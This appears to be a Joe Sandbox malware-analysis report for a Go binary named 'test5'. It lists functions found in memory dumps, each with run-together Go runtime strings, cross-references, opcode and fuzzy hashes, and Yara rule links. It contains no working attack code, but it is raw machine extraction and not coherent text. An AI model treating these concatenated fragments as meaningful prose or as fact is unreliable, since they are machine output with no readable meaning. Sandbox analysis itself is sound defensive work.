gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek, xrefs: 00697AB2

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: $ &n$ MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:$ MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=$ ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACE$ ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=$.$failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPre$gc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::1se$gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek$non-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class bo
API String ID: 0-1309298311
Opcode ID: b73bc3cca150b57e16f380ba732e93f41d67d5452e04359ef8584975afe4fe5f
Instruction ID: d26db3dd125efb74b70664bd2665c1d76701da5b512f561f1fdf241b5185ccd9
Opcode Fuzzy Hash: b73bc3cca150b57e16f380ba732e93f41d67d5452e04359ef8584975afe4fe5f
Instruction Fuzzy Hash: 1372C476608BC089DB61DF15E8813EE77AAF78A780F44812ADA8C43B66DF3CC084C755

Function 006A9260 Relevance: 14.3, Strings: 11, Instructions: 543COMMON

Download Yara Rule

Strings

, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fnil keytls3descharset\\.\UNCos/execr, xrefs: 006A9A7A
runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket, xrefs: 006A9B45
runtime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup29802322, xrefs: 006A9605
] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytest, xrefs: 006A9586
runtime: p.searchAddr = range partially overlapsstack trace unavailablebindm in unexpected GOOSruntime: mp.lockedInt = runqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlock116415321826934814453125582076609134674072265625connection reset by , xrefs: 006A9AC5
, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:, xrefs: 006A9B65
, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad add, xrefs: 006A9A5C
] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<ni, xrefs: 006A99D4
bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006A962F, 006A9D8C
, i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= bad ts(...) m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Co, xrefs: 006A9AE5
runtime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 006A954D, 006A9992

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: , i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= bad ts(...) m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Co$, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fnil keytls3descharset\\.\UNCos/execr$, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:$, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad add$] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<ni$] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytest$bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket$runtime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup29802322$runtime: p.searchAddr = range partially overlapsstack trace unavailablebindm in unexpected GOOSruntime: mp.lockedInt = runqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlock116415321826934814453125582076609134674072265625connection reset by $runtime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
API String ID: 0-3623285289
Opcode ID: 924291ffc78aa9876ca91004933764638917c258110995a5e11da2020c2abb45
Instruction ID: 5b203ea9d7c9e052482eb51e149c342df77fa6184da409ec55553b4258bb19cd
Opcode Fuzzy Hash: 924291ffc78aa9876ca91004933764638917c258110995a5e11da2020c2abb45
Instruction Fuzzy Hash: AA32CCB6718BC581DB60AF11F8403EAA36AF789BC0F504026DE9D17B5ADF38C985CB54

Function 00695FC0 Relevance: 14.1, Strings: 11, Instructions: 360COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedstopTheWorld: broken, xrefs: 006965E6
nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated RtlGetVersion, xrefs: 006965B6
runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultattempted to trace stack of a goroutine this thread does not ownuser arena chunk size is not a multiple of the physical page sizerun, xrefs: 006965A5
runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block, xrefs: 006964FF
runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru, xrefs: 006965F7
, not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed, xrefs: 006965D7
runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= runtime: NtCreateWaitCompletionPacket failed; errno=, xrefs: 00696594
runtime.SetFinalizer: pointer not at beginning of allocated blockreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerembedded IPv4 address must replace the final 2 fields of the addressruntime.Pinner: found leaking pinned pointer; forgot to cal, xrefs: 00696510
, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006964F0
because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime., xrefs: 00696490
runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inco, xrefs: 0069640C, 00696463, 006964CB

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.$, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$, not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed$nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated RtlGetVersion$runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inco$runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedstopTheWorld: broken$runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru$runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultattempted to trace stack of a goroutine this thread does not ownuser arena chunk size is not a multiple of the physical page sizerun$runtime.SetFinalizer: pointer not at beginning of allocated blockreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerembedded IPv4 address must replace the final 2 fields of the addressruntime.Pinner: found leaking pinned pointer; forgot to cal$runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= runtime: NtCreateWaitCompletionPacket failed; errno=$runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block
API String ID: 0-1619921328
Opcode ID: 42266ad7701e434287321457984a52d60fb800c333d46ffb8e4e5990762880e2
Instruction ID: 7d557548f8054e76ad7eee9d0418c8028619105a1f47e76aa248bd8a8ffac31e
Opcode Fuzzy Hash: 42266ad7701e434287321457984a52d60fb800c333d46ffb8e4e5990762880e2
Instruction Fuzzy Hash: 3DE1D172605B8485DF609F21E4813AEB7AAF784B80F49813AEB8D57B99DF3CC494C710

Function 0000021551C061C0 Relevance: 13.3, APIs: 10, Instructions: 790COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0000021551C0632D
_snprintf.LIBCMT ref: 0000021551C063EE
_snprintf.LIBCMT ref: 0000021551C0640B
_snprintf.LIBCMT ref: 0000021551C06660
_snprintf.LIBCMT ref: 0000021551C06770
_snprintf.LIBCMT ref: 0000021551C0682E
_snprintf.LIBCMT ref: 0000021551C068E6
_snprintf.LIBCMT ref: 0000021551C0668A

Part of subcall function 0000021551C0D57C: _errno.LIBCMT ref: 0000021551C0D5B3
Part of subcall function 0000021551C0D57C: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0D5BE

_snprintf.LIBCMT ref: 0000021551C068FE
_snprintf.LIBCMT ref: 0000021551C069BC

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: f518e0120c3d6e3aa0ccdadf425e12db238b36e208482e03aec2dc881709939c
Instruction ID: 52ee38cfc0bb47e8a4c92e1377104d4836f753f997dd6c25f96d3f1e84503587
Opcode Fuzzy Hash: f518e0120c3d6e3aa0ccdadf425e12db238b36e208482e03aec2dc881709939c
Instruction Fuzzy Hash: 5452C13051CDA8ABE759AF2CD4867E9F7E1FFA8305F805258D985C7152EB31E582CB80

Function 006CF740 Relevance: 12.9, Strings: 10, Instructions: 364COMMON

Download Yara Rule

Strings

args stack map entries for invalid runtime symbol tableruntime: no module data for mismatched isSending updates[originating from goroutine traceRegion: alloc too large18189894035458564758300781259094947017729282379150390625file descriptor in bad statedestinat, xrefs: 006CFACF
untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431640625file too largeis a directorylevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many userswinapi error #unexpect, xrefs: 006CFB97
locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of range227373675443232059478759765625socket operation on non-socketinappropriate ioctl for deviceprotocol wrong type for socketreflect: Elem of inv, xrefs: 006CFC55
runtime: pcdata is bad ABI description14901161193847656257450580596923828125bad file descriptordisk quota exceededtoo many open filesdevice not a streamdirectory not emptyreflect.Value.Bytesreflect.Value.Fieldreflect.Value.IndexEgypt Standard TimeSudan Standar, xrefs: 006CFA93, 006CFC1F
untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-, xrefs: 006CFD0C
bad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-IPv6 addressunkn, xrefs: 006CFB2A, 006CFCAA
and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensen, xrefs: 006CFAAF, 006CFC3A
(targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad addressshort writebad argSizemethodargs(submissionsi/o timeout.WithCancel.WithValue(tls10serverHTTPS_PROXYhttps_proxyProcessPrngNetShareAddNetShareDelgocachehashgocache, xrefs: 006CFAF7, 006CFC78
runtime: frame ts set in timertraceback stuck476837158203125advertise errorkey has expirednetwork is downno medium foundno such processinvalid argSize<invalid Value>,M3.2.0,M11.1.0missing address/etc/mdns.allowunknown networkx509keypairleaf()<>@,;:\"/[]?=jstmp, xrefs: 006CFB74, 006CFCE9
missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-, xrefs: 006CFBD9, 006CFD59

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad addressshort writebad argSizemethodargs(submissionsi/o timeout.WithCancel.WithValue(tls10serverHTTPS_PROXYhttps_proxyProcessPrngNetShareAddNetShareDelgocachehashgocache$ and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytestringGetAceGetACPlistensen$ args stack map entries for invalid runtime symbol tableruntime: no module data for mismatched isSending updates[originating from goroutine traceRegion: alloc too large18189894035458564758300781259094947017729282379150390625file descriptor in bad statedestinat$ locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of range227373675443232059478759765625socket operation on non-socketinappropriate ioctl for deviceprotocol wrong type for socketreflect: Elem of inv$ untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=1907348632812595367431640625file too largeis a directorylevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many userswinapi error #unexpect$ untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-$bad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-IPv6 addressunkn$missing stackmapbad symbol tablenon-Go function not in ranges:23841857910156250123456789ABCDEFinvalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExhostLookupOrder=/etc/resolv.confnon-IPv4 addressnon-$runtime: frame ts set in timertraceback stuck476837158203125advertise errorkey has expirednetwork is downno medium foundno such processinvalid argSize<invalid Value>,M3.2.0,M11.1.0missing address/etc/mdns.allowunknown networkx509keypairleaf()<>@,;:\"/[]?=jstmp$runtime: pcdata is bad ABI description14901161193847656257450580596923828125bad file descriptordisk quota exceededtoo many open filesdevice not a streamdirectory not emptyreflect.Value.Bytesreflect.Value.Fieldreflect.Value.IndexEgypt Standard TimeSudan Standar
API String ID: 0-2771183557
Opcode ID: 01a65d25c0be820b918ae928661da3330feb42d07981bb04a31a5a55f7860698
Instruction ID: ad22383c43adc7e6874f5a5883d0af5f13072345875a23b57e530d1468dbb7bd
Opcode Fuzzy Hash: 01a65d25c0be820b918ae928661da3330feb42d07981bb04a31a5a55f7860698
Instruction Fuzzy Hash: 37E1E676218B8186DB94EF25E4807AAB3ABF788780F54512AEF8D43765DF3CC584CB44

Function 006A2C90 Relevance: 10.4, Strings: 8, Instructions: 375COMMON

Download Yara Rule

Strings

sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine 12207031256103515625owner died, xrefs: 006A31D5
sweep increased allocation countremovespecial on invalid pointergetWeakHandle on invalid pointerruntime: root level max pages = NtAssociateWaitCompletionPacket, xrefs: 006A32CF
mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006A31F0
previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:, xrefs: 006A3285
nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes 48828125no anodenil PoolThursdaySaturdayFebruaryNovemberDecember%!Month(netedns0[::1]:53continue_gatewayinvalid address wsaioctlunixgramavx512bwavx512vltlsk, xrefs: 006A3268
swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 006A318F
sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executiontraceSto, xrefs: 006A317E
mspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification, xrefs: 006A3218

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
